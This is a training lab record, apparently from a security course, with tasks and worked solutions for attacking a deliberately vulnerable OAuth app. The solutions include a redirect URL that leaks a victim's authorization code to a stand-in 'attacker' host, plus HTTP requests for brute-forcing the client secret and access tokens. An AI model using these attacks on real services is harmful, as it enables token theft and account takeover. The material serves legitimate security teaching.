{
    "id": "8f3772a5-10b5-4a0d-8f6f-9325f1168a0f",
    "name": "Attacking OAuth",
    "slug": "attacking-oauth",
    "status": "published",
    "lab_type": "pta",
    "is_sample": false,
    "duration_in_seconds": 1800,
    "metadata": {
        "courses": [
            "1dce1618-55b6-4205-9799-e509ad2b2c77",
            "630a470a-1ccf-44eb-8111-8947846b5d78"
        ],
        "pta_sdn": "230",
        "collections": [],
        "pta_namespace": "my.ine",
        "learning_paths": [],
        "has_published_parent": true
    },
    "session": null,
    "company": "a491bc32-c056-4946-9169-cc053387bada",
    "created": "2022-06-23T21:17:16.494455Z",
    "modified": "2024-11-27T14:52:47.257941Z",
    "is_beta": false,
    "lab_objectives": [],
    "main_learning_area": "3e1aa06f-2e9f-4789-b50d-aa027ad8dcfa",
    "learning_areas": [
        {
            "id": "3e1aa06f-2e9f-4789-b50d-aa027ad8dcfa",
            "name": "Cyber Security",
            "slug": "cyber-security"
        }
    ],
    "categories": [],
    "tags": [],
    "difficulty": null,
    "is_web_access": false,
    "is_lab_experience": false,
    "is_featured": false,
    "cve": null,
    "severity": null,
    "year": null,
    "classification": null,
    "is_trackable": false,
    "cpe_credits": null,
    "is_skill_check": false,
    "external_url": "",
    "solution_video": null,
    "explanation_video": null,
    "description": "# Attacking OAuth\n\n# Scenario\n\nYour goal in this lab will be to try some common attacks against a vulnerable, OAuth-powered web application. Prepare the attacks and their working proofs of concept as if you were submitting them to a bug bounty program or a penetration testing report. The web application is based on the GitHub repository below: <https://github.com/koenbuyens/Vulnerable-OAuth-2.0-Applications>\n\n# Goals\n\n-   Create a working proof of concept to attack an OAuth client once they visit a malicious URL\n\n    -   Find an alternative way to gain access to protected resources\n\n# What you will learn\n\n-   Auditing and attacking OAuth implementations\n\n-   Creating a proof of concept for client-side attacks against insecure OAuth implementations\n\n# Recommended tools\n\n-   BurpSuite\n\n-   OAuth 2.0 documentation\n\n# Network Configuration\n\nThe target application can be found at **http://gallery:3005**\n\nThe username is **koen** and the password is **password**.",
    "description_html": "<h1>Attacking OAuth</h1>\n<h1>Scenario</h1>\n<p>Your goal in this lab will be to try some common attacks against a vulnerable, OAuth-powered web application. Prepare the attacks and their working proofs of concept as if you were submitting them to a bug bounty program or a penetration testing report. The web application is based on the GitHub repository below: <a href=\"https://github.com/koenbuyens/Vulnerable-OAuth-2.0-Applications\">https://github.com/koenbuyens/Vulnerable-OAuth-2.0-Applications</a></p>\n<h1>Goals</h1>\n<ul>\n<li>\n<p>Create a working proof of concept to attack an OAuth client once they visit a malicious URL</p>\n<ul>\n<li>Find an alternative way to gain access to protected resources</li>\n</ul>\n</li>\n</ul>\n<h1>What you will learn</h1>\n<ul>\n<li>\n<p>Auditing and attacking OAuth implementations</p>\n</li>\n<li>\n<p>Creating a proof of concept for client-side attacks against insecure OAuth implementations</p>\n</li>\n</ul>\n<h1>Recommended tools</h1>\n<ul>\n<li>\n<p>BurpSuite</p>\n</li>\n<li>\n<p>OAuth 2.0 documentation</p>\n</li>\n</ul>\n<h1>Network Configuration</h1>\n<p>The target application can be found at <strong>http://gallery:3005</strong></p>\n<p>The username is <strong>koen</strong> and the password is <strong>password</strong>.</p>",
    "tasks": "# Tasks\n\n## Task 1. Create a code stealing PoC\n\nCraft a URL that can be sent to a victim in order to steal the authorization code once they log in via the **/oauth** endpoint. You can use the following data: the response type is \"**code**\", the scope is \"**view_gallery**\" and the client_id is \"**photoprint**\".\n\n## Task 2. Use the acquired code to bruteforce the client secret\n\nUse a POST request to the /token endpoint in order to bruteforce the client secret. Consult the OAuth documentation to recreate the request. The **grant type** is \"**authorization_code**\".\n\n## Task 3. Discover another token vulnerability\n\nDiscover another vulnerability by abusing the **/photos/me?access_token=** endpoint.",
    "tasks_html": "<h1>Tasks</h1>\n<h2>Task 1. Create a code stealing PoC</h2>\n<p>Craft a URL that can be sent to a victim in order to steal the authorization code once they log in via the <strong>/oauth</strong> endpoint. You can use the following data: the response type is \"<strong>code</strong>\", the scope is \"<strong>view_gallery</strong>\" and the client_id is \"<strong>photoprint</strong>\".</p>\n<h2>Task 2. Use the acquired code to bruteforce the client secret</h2>\n<p>Use a POST request to the /token endpoint in order to bruteforce the client secret. Consult the OAuth documentation to recreate the request. The <strong>grant type</strong> is \"<strong>authorization_code</strong>\".</p>\n<h2>Task 3. Discover another token vulnerability</h2>\n<p>Discover another vulnerability by abusing the <strong>/photos/me?access_token=</strong> endpoint.</p>",
    "published_date": "2020-10-20T15:32:24Z",
    "solutions": "# Solutions\n\nBelow, you can find solutions for each task. Remember, though, that you can follow your own strategy, which may differ from the one explained in this lab.\n\n## Task 1. Create a code stealing PoC\n\nBased on the OAuth documentation available at <https://tools.ietf.org/html/rfc6749> you can construct the following GET request. Note that you must be logged out when visiting this URL.\n```\nhttp://gallery:3005/oauth/authorize?response_type=code&redirect_uri=http%3A%2F%2Fattacker%2Fcallback&scope=view_gallery&client_id=photoprint\n```\n\nUpon logging in, there is a \"consent screen\" which has to be accepted, just like in a regular login via OAuth.\n\n![1](https://assets.ine.com/content/advanced-wapt/attacking-oauth/1.png)\n\n\nThen, the user is redirected to the \"attacker\" website with the authorization code appended to the callback URL. Any user who is sent the above URL and logs in through it will make a request to the attacker website, disclosing the authorization code.\n\n![2](https://assets.ine.com/content/advanced-wapt/attacking-oauth/2.png)\n\nThe underlying vulnerability is an unvalidated redirection.\n\n## Task 2. Use the acquired code to bruteforce the client secret\n\nBased on a sample token request (<https://auth0.com/docs/api-auth/tutorials/authorization-code-grant>) you can construct the following POST request.\n\n```\nPOST /token HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 137\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nredirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&grant_type=authorization_code&client_id=photoprint&client_secret=\u00a7guess\u00a7&code=44438\n```\n\n**Note**: Copy-pasting the above request may result in formatting issues that will cause the HTTP request to be malformed. The best way to reproduce that request is to log in as described in the manual (by obtaining the first code), capture the request using Burp and send it to Repeater.\n\nUsing Burp Intruder and a wordlist (we used Rockyou-10, available [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-10.txt)) you can bruteforce the client secret.\n\n![3](https://assets.ine.com/content/advanced-wapt/attacking-oauth/3.png)\n\n![4](https://assets.ine.com/content/advanced-wapt/attacking-oauth/4.png)\n\n![5](https://assets.ine.com/content/advanced-wapt/attacking-oauth/5.png)\n\n\n\nShortly after starting the attack, we find that the client secret is \"**secret**\".\n\n![6](https://assets.ine.com/content/advanced-wapt/attacking-oauth/6.png)\n\n![7](https://assets.ine.com/content/advanced-wapt/attacking-oauth/7.png)\n\n![8](https://assets.ine.com/content/advanced-wapt/attacking-oauth/8.png)\n\n\n**In the Repeater window:**  \n\n```\nPOST /token HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 136\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nredirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&grant_type=authorization_code&client_id=photoprint&client_secret=secret&code=44438\n```\n\n![9](https://assets.ine.com/content/advanced-wapt/attacking-oauth/9.png)\n\n**Note:** Specify the **code** that you received in the callback response from Task 1.  \n\nThe access token from the response can now be supplied to the **/photos/me?access_token=** endpoint.\n\n```\nGET /photos/me?access_token=35580 HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n```\n\n**Note:** Make sure to replace the access token in the above request with the one returned by the previous request.  \n\n\n![10](https://assets.ine.com/content/advanced-wapt/attacking-oauth/10.png)\n\n## Task 3. Discover another token vulnerability\n\nAt **/photos/me?access_token=[code]** you are able to bruteforce a valid token. This will require the following Burp Intruder configuration:  \n\n```\nGET /photos/me?access_token=\u00a7\u00a7 HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n```\n\n![11](https://assets.ine.com/content/advanced-wapt/attacking-oauth/11.png)\n\n![12](https://assets.ine.com/content/advanced-wapt/attacking-oauth/12.png)\n\n![13](https://assets.ine.com/content/advanced-wapt/attacking-oauth/13.png)\n\n![14](https://assets.ine.com/content/advanced-wapt/attacking-oauth/14.png)\n\nThis way, an attacker is able to compromise active tokens via bruteforce, since the number of attempts is not limited. Note that in a real application there may be multiple active tokens; as this lab has just one active token, bruteforcing it may take much longer.",
    "solutions_html": "<h1>Solutions</h1>\n<p>Below, you can find solutions for each task. Remember, though, that you can follow your own strategy, which may differ from the one explained in this lab.</p>\n<h2>Task 1. Create a code stealing PoC</h2>\n<p>Based on the OAuth documentation available at <a href=\"https://tools.ietf.org/html/rfc6749\">https://tools.ietf.org/html/rfc6749</a> you can construct the following GET request. Note that you must be logged out when visiting this URL.\n<pre class=\"codehilite\"><code>http://gallery:3005/oauth/authorize?response_type=code&amp;redirect_uri=http%3A%2F%2Fattacker%2Fcallback&amp;scope=view_gallery&amp;client_id=photoprint</code></pre></p>\n<p>Upon logging in, there is a \"consent screen\" which has to be accepted, just like in a regular login via OAuth.</p>\n<p><img alt=\"1\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/1.png\" /></p>\n<p>Then, the user is redirected to the \"attacker\" website with the authorization code appended to the callback URL. Any user who is sent the above URL and logs in through it will make a request to the attacker website, disclosing the authorization code.</p>\n<p><img alt=\"2\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/2.png\" /></p>\n<p>The underlying vulnerability is an unvalidated redirection.</p>\n<h2>Task 2. Use the acquired code to bruteforce the client secret</h2>\n<p>Based on a sample token request (<a href=\"https://auth0.com/docs/api-auth/tutorials/authorization-code-grant\">https://auth0.com/docs/api-auth/tutorials/authorization-code-grant</a>) you can construct the following POST request.</p>\n<pre class=\"codehilite\"><code>POST /token HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 137\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nredirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&amp;grant_type=authorization_code&amp;client_id=photoprint&amp;client_secret=\u00a7guess\u00a7&amp;code=44438</code></pre>\n\n<p><strong>Note</strong>: Copy-pasting the above request may result in formatting issues that will cause the HTTP request to be malformed. The best way to reproduce that request is to log in as described in the manual (by obtaining the first code), capture the request using Burp and send it to Repeater.</p>\n<p>Using Burp Intruder and a wordlist (we used Rockyou-10, available <a href=\"https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-10.txt\">here</a>) you can bruteforce the client secret.</p>\n<p><img alt=\"3\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/3.png\" /></p>\n<p><img alt=\"4\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/4.png\" /></p>\n<p><img alt=\"5\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/5.png\" /></p>\n<p>Shortly after starting the attack, we find that the client secret is \"<strong>secret</strong>\".</p>\n<p><img alt=\"6\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/6.png\" /></p>\n<p><img alt=\"7\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/7.png\" /></p>\n<p><img alt=\"8\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/8.png\" /></p>\n<p><strong>In the Repeater window:</strong>  </p>\n<pre class=\"codehilite\"><code>POST /token HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 136\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nredirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&amp;grant_type=authorization_code&amp;client_id=photoprint&amp;client_secret=secret&amp;code=44438</code></pre>\n\n<p><img alt=\"9\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/9.png\" /></p>\n<p><strong>Note:</strong> Specify the <strong>code</strong> that you received in the callback response from Task 1.  </p>\n<p>The access token from the response can now be supplied to the <strong>/photos/me?access_token=</strong> endpoint.</p>\n<pre class=\"codehilite\"><code>GET /photos/me?access_token=35580 HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1</code></pre>\n\n<p><strong>Note:</strong> Make sure to replace the access token in the above request with the one returned by the previous request.  </p>\n<p><img alt=\"10\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/10.png\" /></p>\n<h2>Task 3. Discover another token vulnerability</h2>\n<p>At <strong>/photos/me?access_token=[code]</strong> you are able to bruteforce a valid token. This will require the following Burp Intruder configuration:  </p>\n<pre class=\"codehilite\"><code>GET /photos/me?access_token=\u00a7\u00a7 HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1</code></pre>\n\n<p><img alt=\"11\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/11.png\" /></p>\n<p><img alt=\"12\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/12.png\" /></p>\n<p><img alt=\"13\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/13.png\" /></p>\n<p><img alt=\"14\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/14.png\" /></p>\n<p>This way, an attacker is able to compromise active tokens via bruteforce, since the number of attempts is not limited. Note that in a real application there may be multiple active tokens; as this lab has just one active token, bruteforcing it may take much longer.</p>",
    "flags": [],
    "min_points_to_pass": null,
    "access_type": "default",
    "user_status": "unstarted",
    "user_lab_status": null,
    "user_status_modified": null,
    "user_flags": [],
    "global_running_session": null
}